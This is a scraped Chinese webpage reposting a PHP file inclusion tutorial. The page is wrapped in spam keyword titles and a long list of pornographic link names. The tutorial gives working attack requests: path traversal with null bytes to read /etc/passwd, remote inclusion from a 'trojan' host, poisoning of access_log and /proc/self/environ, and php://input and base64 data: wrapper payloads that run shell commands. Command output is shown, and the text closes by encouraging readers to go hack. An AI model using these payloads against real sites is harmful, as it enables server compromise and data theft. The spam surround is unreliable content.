青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁(yè) 安全 腳本攻防 查看內(nèi)容

php包含漏洞替代技術(shù)的方法與介紹,php文件包含漏洞詳解

2022-9-27 08:43| 查看: 2228 |來(lái)源: 互聯(lián)網(wǎng)

================ php包含漏洞替代技術(shù) ================ php開發(fā)者們犯得一個(gè)基本的錯(cuò)誤是把一個(gè)不正當(dāng)?shù)淖兞總鬟f給系統(tǒng)函數(shù),特別是include()和require()這兩個(gè)函數(shù)。 這個(gè)常見(jiàn)的錯(cuò)誤導(dǎo)致了眾所周知的遠(yuǎn)程文件包含
================
php包含漏洞替代技術(shù)
================
php開發(fā)者們犯得一個(gè)基本的錯(cuò)誤是把一個(gè)不正當(dāng)?shù)淖兞總鬟f給系統(tǒng)函數(shù),特別是include()和require()這兩個(gè)函數(shù)。
這個(gè)常見(jiàn)的錯(cuò)誤導(dǎo)致了眾所周知的遠(yuǎn)程文件包含漏洞和本地文件包含漏洞。在過(guò)去的幾年中,php已經(jīng)開始試圖通過(guò)缺省設(shè)置來(lái)消除或限制這種漏洞的所帶來(lái)影響。
但即使是簡(jiǎn)單的本地文件包含,也會(huì)有新的技術(shù)去利用這些漏洞來(lái)導(dǎo)致遠(yuǎn)程命令的執(zhí)行。
================
介紹php包含漏洞
================
文件包含漏洞的要點(diǎn)是要去找到一個(gè)方法來(lái)包含帶有你的php惡意代碼的文件。
include($_GET['content']);
?>
http://target/index.php?content=/etc/pa sswd
http://target/index.php?content=http://trojan/exec.php
這是第一個(gè)例子,它包含了本地文件/etc/pa sswd第二個(gè)例子包含了一個(gè)遠(yuǎn)程文件,這個(gè)遠(yuǎn)程包含文件在大多數(shù)情況下不能使用,因?yàn)閜hp設(shè)置中的allow_url_fopen默認(rèn)是off。
當(dāng)然,通常有此漏洞的php代碼會(huì)比上面的例子更有限制性,通常是通過(guò)在前面加上一個(gè)目錄,防止遠(yuǎn)程文件包含,前面加一個(gè)文件擴(kuò)展名來(lái)限制可以包含哪些類型的文件。
include("pages/".$_GET['content'].".php");
?>
http://target/index.php?content=../../../etc/pa sswd%00
.../的使用允許目錄橫向風(fēng)格的操作,使你可以操作代碼中預(yù)定目錄以外的目錄的文件。
如果php設(shè)置中open_basedir為on,它將會(huì)阻止你繞過(guò)過(guò)多的目錄。
網(wǎng)站的開發(fā)者有可能也會(huì)使用一些函數(shù)來(lái)過(guò)濾掉來(lái)自用戶提交的惡意數(shù)據(jù),但并非總是如此。
空字節(jié)字符%00(\0)終止字符串,來(lái)切斷在它之后提交的任何東西,即是當(dāng)magic_quotes_gpc 默認(rèn)為on的時(shí)候,也可以逃過(guò)。
在http://ush.it網(wǎng)站中有一篇名為《PHP文件系統(tǒng)的攻擊媒介》提供了可能的方法來(lái)應(yīng)付空字節(jié)字符。
php腳本安全也可能取決于像$_GLOBAL[]或$_SERVER[]等的變量,像最近被發(fā)現(xiàn)的phplist的漏洞(phplist是一款國(guó)外的Email程序),例子為
http://target/phplist/admin/?_SERVER[ConfigFile]=/etc/pa sswd
==================
本地文件包含致遠(yuǎn)程代碼執(zhí)行
==================
一次你找到一個(gè)本地包含漏洞,你需要找到一個(gè)方法去把你的惡意php代碼插入一個(gè)文件中,大量的技術(shù)在過(guò)去的幾年中出現(xiàn)。
有一種在服務(wù)日志中去注入php代碼的技術(shù)比上面這些包含漏洞要出現(xiàn)的晚。
它是有可能的去把我們的代碼插入http請(qǐng)求的頭部,然后包含Apache的access_log日志文件(它可能會(huì)進(jìn)行一些測(cè)試去找到access_log)。
考慮一下這個(gè)例子,在Mac OS X的Apache/PHP默認(rèn)配置下,寫一個(gè)腳本去發(fā)送一個(gè)請(qǐng)求可能是必須的,因?yàn)闉g覽器可能會(huì)對(duì)一些字符進(jìn)行轉(zhuǎn)義。
$a = fsockopen("localhost",80);
fwrite($a,"GET / HTTP/1.1\r\n".
"Host: localhost\r\n".
"Connection: Close\r\n\r\n");
fclose($a);
?>
https://www.jb51.net /index.php?content=/var/log/httpd/access_log&cmd=id
另一種方法是包括了Apache/PHP進(jìn)程的環(huán)境變量的/proc/ self/environ文件。
如果我們將惡意代碼插入U(xiǎn)ser-Agent 的頭部,這些代碼會(huì)出現(xiàn)在那個(gè)文件里,所以遠(yuǎn)程執(zhí)行代碼是可能的。
/proc/ self/environ必須是可讀的
$a = fsockopen("localhost",80);
fwrite($a,"GET /../../../../proc/ self/environ HTTP/1.1\r\n".
"User-Agent: \r\n".
"Host: localhost\r\n".
"Connection: Close\r\n\r\n");
fclose($a);
?>
=================
Php封裝包含漏洞
====================
利用php的include函數(shù)的另一種方法是利用php封裝(http://www.php.net/wrappers.php)。這個(gè)例子將使用PHP輸入,從一個(gè)HTTP POST請(qǐng)求的原始數(shù)據(jù)并執(zhí)行它:
漏洞代碼:
include($_GET['content']);
?>
我們的請(qǐng)求:
$request = "";
$req = "POST /index.php?content=php://input
HTTP/1.1\r\n".
"Host: localhost\r\n".
"Content-type: text/html\r\n".
"Content-length: ".strlen($request)."\r\n".
"Connection: Close\r\n\r\n".
"$request \r\n\r\n";
$a = fsockopen("10.0.2.2",80);
fwrite($a,$req);
echo $req;
while (!feof($a)){echo fgets($a, 128);}
fclose($a);
?>
得到的結(jié)果:uid=33(www-data) gid=33(www-data) groups=33(www-data)
這個(gè)例子的前提是allow_url_include和allow_fopen_include兩個(gè)選項(xiàng)設(shè)置為ON,在這種情況下,標(biāo)準(zhǔn)的遠(yuǎn)程文件包含是可能的。
這個(gè)方法的優(yōu)點(diǎn)是它不依賴于外部?jī)?chǔ)存文件服務(wù)器。
cr0w-at.blogspot.com提到另一種技術(shù)使用"數(shù)據(jù):"封裝:
index.php?content=data:,?&c=dir
或者base64編碼過(guò)的:
index.php?content=data:;base64, \PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir
============
總結(jié)
============
這些方法大多都不是新的,并沒(méi)有表現(xiàn)出缺陷或在PHP語(yǔ)言本身的局限性。這些問(wèn)題通常可以通過(guò)強(qiáng)大的輸入驗(yàn)證,常識(shí)編碼,和一些預(yù)防更嚴(yán)格的服務(wù)器配置。
然而,許多問(wèn)題并不是很快能消失的(SQL注入等),所以開心的去黑吧。
*本文中闡述的漏洞不會(huì)存在于Silic Group的網(wǎng)站
*如果你足夠細(xì)心,你會(huì)發(fā)現(xiàn)文中很多關(guān)鍵字,例如敏感路徑、敏感函數(shù),都被加了個(gè)空格
*是因?yàn)榉⻊?wù)器的防火墻會(huì)攔截此類關(guān)鍵字,檢測(cè)到關(guān)鍵字時(shí)服務(wù)器就會(huì)顯示501/503錯(cuò)誤
*這就是BlackBap.Org所在服務(wù)器攔截的原因
*本站管理員注:-)
作者:Anonymous
本文最后更新于 2022-9-27 08:43,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 国产伦子沙发午休系列资源曝光 | 扒开 浓密 毛 | 青青草原在线新免费 | 国产跪地吃黄金喝圣水合集 | 最近免费中文字幕MV免费高清 | 日韩精品卡1卡2三卡四卡乱码 | 亲胸揉胸膜下刺激视频网站APP | 撕开美女的衣服2 | 无码AV动漫精品一区二区免费 | 妹妹的第一次有点紧 | 国产福利秒拍weipai.ee | 久久电影院久久国产 | 色中色入口2015 | 大桥未久电影在线观看 | 欧美黑人巨大xxxxx | 国产AV视频二区在线观看 | 国产精品一区二区亚瑟不卡 | 精品国产品国语在线不卡 | 成人精品视频在线观看播放 | 免费观看成人www精品视频在线 | 桥本有菜护士 | 久久无码AV亚洲精品色午夜麻豆 | 亚洲 欧美 日韩 精品 自拍 | 韩日美无码精品无码 | 45分钟做受片免费观看 | 国内精品视频一区二区在线观看 | 亚洲精品无码不卡 | 国产一区二区无码蜜芽精品 | 伊人色综合久久大香 | 国产成人在线小视频 | 久久精品视频在线看99 | 国产亚洲tv在线观看 | 欧美ZC0O人与善交的最新章节 | 动漫成年美女黄漫网站 | 中文在线日韩亚洲制服 | 任你躁国语自产二区在线播放 | 戳女人屁股流水羞羞漫画 | 成人亚洲精品 | 刮伦人妇A极一片 | 亚洲专区区免费 | 亚洲高清视频在线观看 |